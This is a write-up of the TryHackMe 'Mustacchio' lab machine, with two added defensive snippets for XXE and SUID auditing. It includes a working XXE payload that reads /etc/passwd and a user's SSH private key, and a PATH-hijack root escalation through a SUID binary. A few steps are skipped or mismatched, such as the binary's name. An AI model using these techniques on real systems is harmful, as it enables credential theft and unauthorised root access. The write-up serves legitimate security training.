TryHackMe - Mustacchio
Here is Strupo_'s write-up for an "Easy boot2root Machine" called Mustacchio, by zyeinn, on TryHackMe.com.
The challenge was solved by conducting some basic enumeration, exploiting an XXE injection vulnerability, cracking a password, and leveraging an SUID binary to root the system.
Enumeration
To begin, nmap was used to determine open ports:
$ nmap -p- --open -sV -v -Pn -oA nmap-mustacchio 10.10.81.167
<snip>
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
8765/tcp open http nginx 1.10.3 (Ubuntu)
<snip>
Manually browsing to the web servers revealed a mustache-based blog on 80/tcp and an admin login prompt on 8765/tcp, as seen below:
Admin Panel Login
Next, ffuf was used to enumerate content on the web server:
$ ffuf -u http://10.10.81.167/FUZZ -w /usr/share/wordlists/dirb/big.txt
<snip>
.htaccess [Status: 403, Size: 277, Words: 20, Lines: 10]
.htpasswd [Status: 403, Size: 277, Words: 20, Lines: 10]
custom [Status: 301, Size: 313, Words: 20, Lines: 10]
fonts [Status: 301, Size: 312, Words: 20, Lines: 10]
images [Status: 301, Size: 313, Words: 20, Lines: 10]
robots.txt [Status: 200, Size: 28, Words: 3, Lines: 3]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [20470/20470] :: Job [1/1] :: 319 req/sec :: Duration: [0:01:04] :: Errors: 0 ::
There was not much to review under the /custom directory, so manually browsing to it and checking all of its contents quickly turned up the users.bak file:
A quick Google search of the hash returned the cleartext password.
Obtaining User Access
The password was successfully used against the admin portal login page, where a large text entry box was observed. Looking at the HTML source code also revealed the following comments of interest:
<!-- Barry, you can now SSH in using your key!-->
and
//document.cookie = "Example=/auth/dontforget.bak";
The contents of /auth/dontforget.bak can be seen below:
$ cat dontforget.bak
<?xml version="1.0" encoding="UTF-8"?>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>his paragraph was a waste of time and space. If you had not read this and I had not typed this you and I could’ve done something more productive than reading this mindlessly and carelessly as if you did not have anything else to do in life. Life is so precious because it is short and you are being so careless that you do not realize it until now since this void paragraph mentions that you are doing something so mindless, so stupid, so careless that you realize that you are not using your time wisely. You could’ve been playing with your dog, or eating your cat, but no. You want to read this barren paragraph and expect something marvelous and terrific at the end. But since you still do not realize that you are wasting precious time, you still continue to read the null paragraph. If you had not noticed, you have wasted an estimated time of 20 seconds.</com>
</comment>
This backup file was used as a template for an XXE injection proof-of-concept:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY strupo SYSTEM "php://filter/read=bzip2.compress/read=convert.base64-encode/resource=/etc/passwd">]>
<comment>
<name>Joe Hamd</name>
<author>Barry Clad</author>
<com>&strupo;</com>
</comment>
This successfully rendered the base64-encoded contents of /etc/passwd. The first comment mentioned using an SSH key, so it was simply a matter of changing the resource value from /etc/passwd to "/home/barry/.ssh/id_rsa".
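The injection works because the server-side parser accepts a DOCTYPE and expands the entity it declares. The following is an added example (not part of the original write-up or the room's code) of a parser for the same comment format that refuses any DOCTYPE; the function name and both sample documents are constructed for illustration.

```python
import xml.parsers.expat

class DoctypeRejected(ValueError):
    """Raised when a submitted document carries a DOCTYPE declaration."""

FIELDS = ("name", "author", "com")  # child elements seen in dontforget.bak

# Constructed samples: one plain comment, one that declares an external entity.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>\n<comment>\n'
          b'<name>Joe Hamd</name>\n<author>Barry Clad</author>\n'
          b'<com>hello</com>\n</comment>')
WITH_DTD = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<!DOCTYPE root [<!ENTITY e SYSTEM "file:///constructed/example">]>'
            b'<comment><com>&e;</com></comment>')

def parse_comment(xml_bytes):
    """Parse a <comment> document; abort as soon as a DOCTYPE is seen."""
    parser = xml.parsers.expat.ParserCreate()
    result, stack, buf = {}, [], []

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires before any <!ENTITY ...> is processed, so nothing is defined.
        raise DoctypeRejected("DOCTYPE not allowed in comment XML")

    def on_start(tag, attrs):
        stack.append(tag)
        buf.clear()

    def on_text(data):
        buf.append(data)

    def on_end(tag):
        # Only direct children of <comment> are accepted as fields.
        if tag in FIELDS and len(stack) == 2 and stack[0] == "comment":
            result[tag] = "".join(buf)
        stack.pop()

    parser.StartDoctypeDeclHandler = on_doctype
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_text
    parser.EndElementHandler = on_end
    parser.Parse(xml_bytes, True)
    return result
```

With no DTD allowed, an undeclared entity reference such as `&e;` is a well-formedness error, so the document is rejected either way.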
To turn the base64 blob to an actual key, I copied the encoded text to a file and used the following command: base64 -d -w0 < b64.id_rsa > id_rsa
The key was password protected and so ssh2john was leveraged to generate a hash that could be cracked by john or hashcat:
$ python ssh2john.py id_rsa > id_rsa.hash
total 20
-rw-r--r-- 1 barry barry 33 Jun 12 15:48 user.txt
drwxr-xr-x 2 barry barry 4096 Jun 12 15:48 .ssh
drwxr-xr-x 4 root root 4096 Jun 12 15:48 ..
drwx------ 2 barry barry 4096 Jun 13 03:10 .cache
drwxr-xr-x 4 barry barry 4096 Jun 13 03:10 .
barry@mustacchio:~$ cat user.txt
Privilege Escalation
In order to elevate to root, I noticed an interesting looking binary in the /home/joe/ directory called "live_update". Using strings, I could see that it would simply tail -f the access.log file for the nginx web server.
Initially, I attempted escaping special character encoding and injecting control characters into the user-agent, but this was a dead end for me.
Next, I checked if it had the SUID bit set and it was! A quick way to spot check is ls -l and you can see the "s" in the permissions, but you can also do a system-wide search by using find:
$ find / -perm -4000 2>/dev/null
I then did some searching just to make sure that there wasn't some simple way of dropping to a shell like you can with less but I didn't find anything. Then it occurred to me that if I could update my path to link tail to a binary that I specified, I should be able to root the box.
I did this by performing the following steps:
barry@mustacchio:~$ mkdir bin && cd bin
barry@mustacchio:~/bin$ export PATH=$HOME/bin:$PATH
barry@mustacchio:~/bin$ nano foo
barry@mustacchio:~/bin# cat foo
#!/bin/bash
/bin/bash
barry@mustacchio:~/bin$ chmod +x foo
barry@mustacchio:~/bin$ ln -s foo tail
barry@mustacchio:~/bin$ ../../joe/./live_log
root@mustacchio:~# cd /root
root@mustacchio:/root# ls -l
total 4
-rw------- 1 root root 33 Jun 12 15:48 root.txt
root@mustacchio:/root# cat root.txt
<snip>
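The root cause here is a SUID binary that invokes tail by bare name, so the caller's PATH decides which program runs with elevated privileges. The following is an added audit sketch (not from the original write-up) that combines the find and strings checks above: it walks a directory tree, selects setuid files, and flags embedded strings that start with a bare command name. The command list and the sample path in the comment are constructed assumptions.

```python
import os
import re
import stat

# Bare command names to look for; a constructed starter list, extend per host.
COMMANDS = {"tail", "cat", "cp", "ls", "date", "service", "curl", "tar"}
PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")  # same idea as strings(1)

def is_setuid(path):
    """True for a regular file with the setuid bit (find -perm -4000)."""
    st = os.lstat(path)
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)

def bare_command_strings(path):
    """Return embedded strings whose first word is a bare command name."""
    with open(path, "rb") as fh:
        data = fh.read()
    hits = []
    for match in PRINTABLE.finditer(data):
        text = match.group().decode("ascii").strip()
        words = text.split()
        # "tail -f /var/log/nginx/access.log" is flagged;
        # "/usr/bin/tail -f ..." is not, because the path is absolute.
        if len(words) > 1 and words[0] in COMMANDS:
            hits.append(text)
    return hits

def audit(root):
    """Map each setuid file under root to its suspicious strings."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                if is_setuid(path):
                    hits = bare_command_strings(path)
                    if hits:
                        findings[path] = hits
            except OSError:
                continue  # unreadable or vanished file
    return findings

if __name__ == "__main__":
    for path, hits in audit("/").items():
        print(path, hits)
```

A flagged binary is fixed at the source by calling the helper through its absolute path and resetting the environment before executing it, or by dropping the setuid bit if it is not needed.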
Conclusion
This was my first challenge hosted on TryHackMe.com and I really enjoyed it and the service. Signing-up was pain free and it was easy to just jump right into the challenge.
Thanks for reading! @strupo_
Find us on twitter: @teamWTG